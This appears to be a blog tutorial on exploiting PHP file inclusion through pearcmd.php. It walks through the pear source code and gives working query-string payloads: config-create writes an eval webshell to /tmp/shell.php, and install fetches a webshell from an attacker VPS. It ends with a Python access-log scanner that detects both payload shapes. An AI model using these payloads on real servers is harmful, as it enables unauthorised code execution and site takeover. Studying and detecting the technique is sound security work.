pearcmd File Inclusion

A summary of how pearcmd file inclusion is exploited: when you run into PHP together with a file inclusion bug, this is a direction worth trying.

Prerequisites

  • The pear extension is installed
  • The register_argc_argv option is enabled in PHP

The PHP Docker images install the pear extension by default and also enable the register_argc_argv option automatically.

How it works

The pear extension is a command-line package manager for PHP. Its default install path is /usr/local/lib/php/pearcmd.php, and on the command line it can be run either as pear or as php /usr/local/lib/php/pearcmd.php. If a file inclusion vulnerability exists, this command-line tool can be reached through it.

When register_argc_argv is enabled, everything after the ? in the URL is passed into the $_SERVER['argv'] variable, regardless of whether the parameters contain an equals sign.

In pearcmd.php the pear extension reads the command-line arguments like this:

    PEAR_Command::setFrontendType('CLI');
    $all_commands = PEAR_Command::getCommands();

    // Read the command line; under a web SAPI this ends up coming from $_SERVER['argv']
    $argv = Console_Getopt::readPHPArgv();
    // fix CGI sapi oddity - the -- in pear.bat/pear is not removed
    if (php_sapi_name() != 'cli' && isset($argv[1]) && $argv[1] == '--') {
        unset($argv[1]);
        $argv = array_values($argv);
    }

Here readPHPArgv() is called to obtain the command-line arguments:

    public static function readPHPArgv()
    {
        global $argv;
        if (!is_array($argv)) {
            if (!@is_array($_SERVER['argv'])) {
                if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                    $msg = "Could not read cmd args (register_argc_argv=Off?)";
                    return PEAR::raiseError("Console_Getopt: " . $msg);
                }
                return $GLOBALS['HTTP_SERVER_VARS']['argv'];
            }
            // Web request: filled from the query string when register_argc_argv=On
            return $_SERVER['argv'];
        }
        return $argv;
    }

readPHPArgv() reads the arguments from $argv, $_SERVER['argv'] or $GLOBALS['HTTP_SERVER_VARS']['argv'], and $_SERVER['argv'] is a variable the client controls. Therefore the variables supplied via GET can be fed straight into pear.

Exploitation

The official **php:7.4-apache** image is used for testing.

Looking for usable pear commands:

    Commands:
    build                Build an Extension From C Source
    bundle               Unpacks a Pecl Package
    channel-add          Add a Channel
    channel-alias        Specify an alias to a channel name
    channel-delete       Remove a Channel From the List
    channel-discover     Initialize a Channel from its server
    channel-info         Retrieve Information on a Channel
    channel-login        Connects and authenticates to remote channel server
    channel-logout       Logs out from the remote channel server
    channel-update       Update an Existing Channel
    clear-cache          Clear Web Services Cache
    config-create        Create a Default configuration file
    config-get           Show One Setting
    config-help          Show Information About Setting
    config-set           Change Setting
    config-show          Show All Settings
    convert              Convert a package.xml 1.0 to package.xml 2.0 format
    cvsdiff              Run a "cvs diff" for all files in a package
    cvstag               Set CVS Release Tag
    download             Download Package
    download-all         Downloads each available package from the default channel
    info                 Display information about a package
    install              Install Package
    list                 List Installed Packages In The Default Channel
    list-all             List All Packages
    list-channels        List Available Channels
    list-files           List Files In Installed Package
    list-upgrades        List Available Upgrades
    login                Connects and authenticates to remote server [Deprecated in favor of channel-login]
    logout               Logs out from the remote server [Deprecated in favor of channel-logout]
    makerpm              Builds an RPM spec file from a PEAR package
    package              Build Package
    package-dependencies Show package dependencies
    package-validate     Validate Package Consistency
    pickle               Build PECL Package
    remote-info          Information About Remote Packages
    remote-list          List Remote Packages
    run-scripts          Run Post-Install Scripts bundled with a package
    run-tests            Run Regression Tests
    search               Search remote package database
    shell-test           Shell Script Test
    sign                 Sign a package distribution file
    svntag               Set SVN Release Tag
    uninstall            Un-install Package
    update-channels      Update the Channel List
    upgrade              Upgrade Package
    upgrade-all          Upgrade All Packages [Deprecated in favor of calling upgrade with no parameters]
    Usage: pear [options] command [command-options] <parameters>
    Type "pear help options" to list all options.
    Type "pear help shortcuts" to list all command shortcuts.
    Type "pear help version" or "pear version" to list version information.
    Type "pear help <command>" to get the help for the specified command.

There are two exploitation methods.

config-create

This command takes two arguments:

    pear config-create /Diana /tmp/test.txt

The first argument is written into the file created at the path given by the second argument. This can be used to write a PHP webshell, which is then loaded through the file inclusion vulnerability:

    ?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd']);?>+/tmp/shell.php

That writes the webshell; then connect to it:

    http://127.0.0.1/?file=/tmp/shell.php

install

This command tries to download a file, so a webshell can be hosted on your own VPS:

    pear install http://[vps]:[port]/muma1.php

A muma1.php then appears under /tmp/pear/download/.

Modify the payload and use --installroot to specify the download directory:

    ?+install+--installroot+&file=/usr/local/lib/php/pearcmd.php&+http://[vps]:[port]/muma1.php

This uploads the webshell; the file ends up at the path &file=/usr/local/lib/php/pearcmd.php&/tmp/pear/download/muma1.php
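As an added defender's example (not code from the post), the following Python scan reproduces the register_argc_argv split of the query string on '+' and flags both payload shapes described above, config-create and install, in web access logs, plus the follow-up request that includes the file config-create wrote. The combined log format, the field names and the sample lines are assumptions constructed here.

```python
import re
from urllib.parse import unquote

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')  # "GET /?a=b HTTP/1.1"
PEAR_MARKER = "pearcmd.php"
PEAR_COMMANDS = {"config-create", "install"}  # the two subcommands the post abuses

def pear_argv(target: str) -> list:
    """What register_argc_argv hands to pearcmd: query string, percent-decoded, split on '+'."""
    return unquote(target.split("?", 1)[1]).split("+") if "?" in target else []

def analyze_request(target: str):
    """Finding if the request includes pearcmd.php AND has an abused subcommand as a bare argv token."""
    argv = pear_argv(target)
    hits = [i for i, tok in enumerate(argv) if tok in PEAR_COMMANDS]
    if not hits or not any(PEAR_MARKER in tok for tok in argv):
        return None  # a benign ?file=x&page=install never yields a bare 'install' token
    i = hits[0]
    finding = {"command": argv[i], "written_file": None, "remote_url": None}
    if argv[i] == "config-create" and len(argv) > i + 2:
        finding["written_file"] = argv[i + 2]  # 2nd positional arg is the file written
    elif argv[i] == "install":  # remote package URL, usually after --installroot <dir>
        finding["remote_url"] = next((t for t in argv if t.startswith(("http://", "https://"))), None)
    return finding

def scan_log(lines: list) -> list:
    """Scan access-log lines; a later include of a file an earlier config-create wrote is stage two."""
    findings, written = [], set()
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        f = analyze_request(target)
        if f is None and any(w in unquote(target) for w in written):
            f = {"command": "include-written-file", "written_file": None, "remote_url": None}
        if f:
            findings.append({"client": line.split(" ", 1)[0], **f})
            if f["written_file"]:
                written.add(f["written_file"])
    return findings

# Constructed sample lines (not real traffic): 1 and 3 are the post's two payload shapes,
# 2 is the follow-up include of the written file, 4 is a benign request that must not match.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jan/2024:10:00:01 +0000] "GET /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/%3C?=@eval($_POST[%27cmd%27]);?%3E+/tmp/shell.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Jan/2024:10:00:02 +0000] "GET /?file=/tmp/shell.php HTTP/1.1" 200 17',
    '198.51.100.9 - - [05/Jan/2024:10:01:00 +0000] "GET /?+install+--installroot+&file=/usr/local/lib/php/pearcmd.php&+http://198.51.100.9:8000/muma1.php HTTP/1.1" 200 240',
    '192.0.2.5 - - [05/Jan/2024:10:02:00 +0000] "GET /?file=about.php&page=install HTTP/1.1" 200 3000',
]
```

Running scan_log(SAMPLE_LOG) yields three findings (config-create writing /tmp/shell.php, the include of that file, and install fetching the remote URL) and none for the benign fourth line.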

Author

D1anash1ba

Published

2024-01-05

Updated

2024-01-05
